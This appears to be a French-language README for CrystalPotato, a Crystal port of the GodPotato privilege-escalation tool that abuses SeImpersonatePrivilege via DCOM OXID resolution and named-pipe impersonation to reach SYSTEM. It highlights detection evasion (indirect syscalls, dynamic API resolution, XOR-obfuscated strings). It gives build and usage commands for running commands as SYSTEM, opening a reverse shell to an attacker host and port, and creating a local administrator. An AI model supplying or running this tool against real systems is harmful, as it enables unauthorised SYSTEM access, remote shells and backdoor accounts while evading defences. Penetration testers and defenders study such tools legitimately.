
Portage en Crystal de GodPotato pour abuser du privilège SeImpersonatePrivilege avec des syscalls indirects, résolution dynamique d'API et obfuscation de chaînes à la compilation. Exécutez des commandes, des shells inversés ou ajoutez des utilisateurs.
Portage en Crystal de GodPotato, une élévation de privilèges locale depuis des comptes disposant du privilège SeImpersonatePrivilege jusqu'à SYSTEM. Cela fonctionne en abusant du résolveur OXID DCOM et de l'usurpation de tubes nommés.
Les API Windows sont résolues dynamiquement et invoquées via des stubs d'appels système indirects, toutes les chaînes sont obfusquées par XOR au moment de la compilation et, par défaut, seule la sortie de la commande est affichée. Testé sur Windows 10, 11 et Server 2025.
CrystalPotato se compile en un seul fichier sans dépendances à l'aide de Crystal sur Windows :
crystal build CrystalPotato.cr -o CrystalPotato.exe --release --static
Exécuter une commande, lancer un reverse shell, ou créer un administrateur local.
CrystalPotato.exe -c <COMMAND>
CrystalPotato.exe -H <LHOST> -P <LPORT> [-c <SHELL>]
CrystalPotato.exe -u <USER> -pw <PASS>

GodPotato - Implémentation originale en C# par BeichenDream.
RustPotato - Implémentation en Rust par safedv.
SigmaPotato - Implémentation en C# avec fonctionnalités supplémentaires par tylerdotrar.
| Option | Description |
|---|
-c CMD | Commande à exécuter en tant que SYSTEM ou shell pour le reverse shell (défaut : cmd.exe) |
-H HOST | Hôte du listener du reverse shell |
-P PORT | Port du listener du reverse shell |
-u USER | Créer un administrateur local - Nom d'utilisateur |
-pw PASS | Créer un administrateur local - Mot de passe |
-p NAME | Nom de tube nommé personnalisé (défaut : Crystal) |
-d | Sortie de débogage |
-dd | Trace complète |
-h | Afficher l'aide |